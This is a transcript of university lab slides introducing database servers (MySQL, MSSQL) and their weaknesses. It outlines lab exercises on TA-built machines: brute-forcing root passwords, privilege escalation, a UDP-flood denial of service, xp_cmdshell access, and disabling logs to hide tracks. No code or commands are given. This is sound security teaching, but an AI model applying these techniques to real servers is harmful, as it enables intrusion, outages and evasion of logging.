Databases - ECE Users Pages
Download
Report
Transcript Databases - ECE Users Pages
Databases
Kevin Wright
Ben Bruckner
Group 40
Outline
Background
Vulnerabilities
Log File Cleaning
This Lab
Background: Databases
Store very large volumes of information
Credit card numbers
Names
Dates
Database servers make this information available on the
internet
Retail sites can remember your billing and shipping information
Allows web surfers to browse through all of a company’s
products online
Background: SQL Servers
Group data into tables and tables into
databases
Database servers are generally not
connected directly to the internet, but
rather are connected to web servers
SQL = Structured Query Language, which
can be used to create, delete, modify, or
query data from a database
Typical Database Server Setup
Lots of security
User’s
machine
internet
Company’s
internet server
Password crack, Buffer
overflow, SQL injection, weak
default settings, etc...
Not much
security
Company’s
database server
Different Databases
MySQL 4.23
Microsoft SQL Server 2000
http://www.mysql.com
“The world’s most popular open source database”
Runs on Windows and a wide variety of Unix operating systems,
including Mac OS X
Since it is open source, we can use it for free
Very popular (because it’s Microsoft)
Runs on a “more user friendly” GUI than MySQL
In the lab, we will actually be using a free trial version because
the full version costs between $1,000 and $20,000 per machine.
Other databases include Oracle, IBM DB2, Sybase, etc.
Using a Database Server
The database server is set up on a computer and acts
much like a web server
MySQL runs on port 3306
MSSQL runs on ports 1433 and 1434
Other computers can connect remotely to this database
server and access information
Access privileges are controlled with usernames and
passwords, much like in Unix
Numerous exploits exist that grant root access (thus
allowing the attacker to have access to everything that is
stored in the database) or crash the database server
MySQL Vulnerabilities
Countless buffer overflow vulnerabilities allow
exploitable code to be run at the root level or
can be used in DOS attacks
Password authentication is weak and can be
exploited so that a user can log on as someone
else (sometimes root)
There are several ways for someone with a user
account to gain root privileges just by using the
right combination of commands
Many others…
MSSQL Vulnerabilites
The target of many worms such as SQLSnake and SQLSlammer
Many of the default settings are exploitable (such as
setting the system administrator’s password to null)
Again, buffer overflow vulnerabilities are abundant
Many others…
It is essential to be diligent about downloading the
newest patches for MSSQL (and all other Microsoft
products)
Other Vulnerabilities
SQL Injection
Database
that is linked to a website via a form
SQL commands are entered into the form
fields
ODBC
JDBC
Log File Editing
Most, if not all servers keep a log of all of the
transactions that take place
A perfect attack would be one which left no
evidence of anything ever occurring
Much of the evidence in server logs contains
evidence that can be used to track down the
hacker
In the lab, you will halt the logging function
before you do anything malicious so that no
trace is left behind
MySQL Exploits Used in This Lab
Password busting
Run
a simple script to decrypt the root password in a
brute fashion
Privilege Escalation
Start
with user access
Using only SQL commands, gain root access
Denial of Service
Remotely
shut the server down by flooding port 3306
with UDP traffic
MSSQL Exploits Used in This Lab
Password
XP_CMDSHELL
The MSSQL server command XP_CMDSHELL
opens up a windows shell
If we gain access to a Windows command shell, we
gain access to the server
Slammer Worm
The worm was widely circulated and targeted a
buffer overflow vulnerability in MSSQL Server 2000
that was used in a Denial of Service (DoS) attack
Lab Overview
Machines running MySQL server and MSSQL
server have been set up by the TAs
You must gain access to these machines to run
the aforementioned exploits on the servers
The exploits will either shut the servers down or
give you access to sensitive information
Explore how to disable the logger to cover your
tracks